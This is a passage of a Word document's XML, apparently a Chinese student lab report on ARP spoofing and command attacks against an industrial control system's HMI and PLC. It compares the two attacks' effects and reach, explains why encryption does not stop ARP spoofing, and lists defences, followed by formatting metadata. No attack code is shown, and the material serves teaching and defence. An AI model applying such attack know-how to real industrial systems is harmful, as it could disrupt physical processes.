        <w:t>影响结果：ARP 欺骗仅导致 HMI 与 PLC 失去连接，PLC 维持原有状态运行；指令攻击会使 PLC 状态异常且无法正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681AA5E3">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>攻击范围：ARP 欺骗限于局域网内；指令攻击可远程执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F99EE">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>3）本实验中的 ARP 欺骗攻击对实验三中受到加密保护的系统是否有效？为什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C4C2D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仍然有效。因为 ARP 欺骗攻击的原理是破坏 IP 与 MAC 地址的正确映射关系，干扰设备间的通信链路；而实验三中的加密保护仅针对数据包内容进行加密，防止内容被解析，无法阻止 ARP 欺骗对通信链路的干扰。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4D02E3">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>4）简要探讨 ARP 攻击防范措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1310C3C8">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>静态 ARP 表设置：手动绑定 IP 与 MAC 地址，避免动态 ARP 缓存被篡改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E8738B">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>ARP 监控与检测：通过工具监测异常 ARP 流量，及时发现欺骗行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4401C9">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>部署 ARP 防火墙：过滤不符合规则的 ARP 数据包，阻止恶意欺骗包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFB6E85">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>使用 IDS/IPS 系统：监测并防御网络中的恶意 ARP 行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2959FFD3">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>加密通信：采用 HTTPS、SSH 等加密协议，降低攻击带来的信息泄露风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE75BC">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>安全意识培训：提高管理员和用户对 ARP 攻击的认知，增强防范意识。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48BE5C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五、收获感悟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A7ACA">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>通过本次实验，我们了解学习了scapy包的使用，并且更加深入地了解和熟悉ARP欺骗攻击的手法和原理，以及它对工业控制系统可能造成的危害。同时这也提醒我们要重视网络安全防护工作，在以后的学习中加深对该类威胁的了解与解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DF6B8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C7FDF6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D91"/>
    <w:rsid w:val="000064E7"/>
    <w:rsid w:val="00034C0A"/>
    <w:rsid w:val="00051765"/>
    <w:rsid w:val="00091F96"/>
    <w:rsid w:val="000B0136"/>
    <w:rsid w:val="0015467A"/>
    <w:rsid w:val="00172AC3"/>
    <w:rsid w:val="001C31C3"/>
    <w:rsid w:val="001D1665"/>
    <w:rsid w:val="00225CDB"/>
    <w:rsid w:val="002544B2"/>
    <w:rsid w:val="002A260D"/>
    <w:rsid w:val="002B5066"/>
    <w:rsid w:val="002D4D4F"/>
    <w:rsid w:val="0030186D"/>
    <w:rsid w:val="00320A5E"/>
    <w:rsid w:val="003C134E"/>
    <w:rsid w:val="00402A00"/>
    <w:rsid w:val="0040517C"/>
    <w:rsid w:val="00407A64"/>
    <w:rsid w:val="00427BF6"/>
    <w:rsid w:val="0046157D"/>
    <w:rsid w:val="00491A14"/>
    <w:rsid w:val="00502B52"/>
    <w:rsid w:val="00515D33"/>
    <w:rsid w:val="00533F18"/>
    <w:rsid w:val="005631A7"/>
    <w:rsid w:val="00570465"/>
    <w:rsid w:val="00571A49"/>
    <w:rsid w:val="00601799"/>
    <w:rsid w:val="006407E6"/>
    <w:rsid w:val="00675B07"/>
    <w:rsid w:val="00681296"/>
    <w:rsid w:val="006B6520"/>
    <w:rsid w:val="00702A15"/>
    <w:rsid w:val="00756C9A"/>
    <w:rsid w:val="007D1FC9"/>
    <w:rsid w:val="008066B2"/>
    <w:rsid w:val="008150A6"/>
    <w:rsid w:val="00854795"/>
    <w:rsid w:val="0085541F"/>
    <w:rsid w:val="008A024A"/>
    <w:rsid w:val="008F4DBF"/>
    <w:rsid w:val="00934905"/>
    <w:rsid w:val="0094091E"/>
    <w:rsid w:val="009A53A6"/>
    <w:rsid w:val="00A521C0"/>
    <w:rsid w:val="00A61C1D"/>
    <w:rsid w:val="00AA694D"/>
    <w:rsid w:val="00AE58AE"/>
    <w:rsid w:val="00B03D60"/>
    <w:rsid w:val="00B262CE"/>
    <w:rsid w:val="00B543FC"/>
    <w:rsid w:val="00B54E77"/>
    <w:rsid w:val="00B82AB9"/>
    <w:rsid w:val="00BE5349"/>
    <w:rsid w:val="00BF0FAD"/>
    <w:rsid w:val="00C228BC"/>
    <w:rsid w:val="00C56EB9"/>
    <w:rsid w:val="00C63243"/>
    <w:rsid w:val="00C63C7A"/>
    <w:rsid w:val="00CA3992"/>
    <w:rsid w:val="00CD0AEE"/>
    <w:rsid w:val="00D20567"/>
    <w:rsid w:val="00D26892"/>
    <w:rsid w:val="00D638AC"/>
    <w:rsid w:val="00D8236C"/>
    <w:rsid w:val="00D979D2"/>
    <w:rsid w:val="00DE742E"/>
    <w:rsid w:val="00E35D38"/>
    <w:rsid w:val="00EA2285"/>
    <w:rsid w:val="00EA7BCF"/>
    <w:rsid w:val="00ED263B"/>
    <w:rsid w:val="00F3073F"/>
    <w:rsid w:val="00F46609"/>
    <w:rsid w:val="00F8381F"/>
    <w:rsid w:val="00FA3465"/>
    <w:rsid w:val="00FA6ED1"/>
    <w:rsid w:val="00FC4D91"/>
    <w:rsid w:val="2EE74F38"/>
    <w:rsid w:val="5EA124A7"/>
    <w:rsid w:val="6B4C44DE"/>
    <w:rsid w:val="7141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标题 字符"/>
    <w:basedOn w:val="8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5">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="8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2422</Words>
  <Characters>4060</Characters>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>61</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4829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2021-09-22T01:42:00Z</dcterms:created>
  <dc:creator>DELL</dc:creator>
  <cp:lastModifiedBy>WPS_1701907429</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-29T10:11:31Z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eyJoZGlkIjoiZjFmZWIzNDg2MmIzZjExOTIzMmViNTBmYTMwYTk0ZWYiLCJ1c2VySWQiOiIxNTY3MDU5MTI0In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.23125</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>13EF5B9F3C7C452296C9C351D964DEF3_12</vt:lpwstr>
  </property>
</Properties>
</file>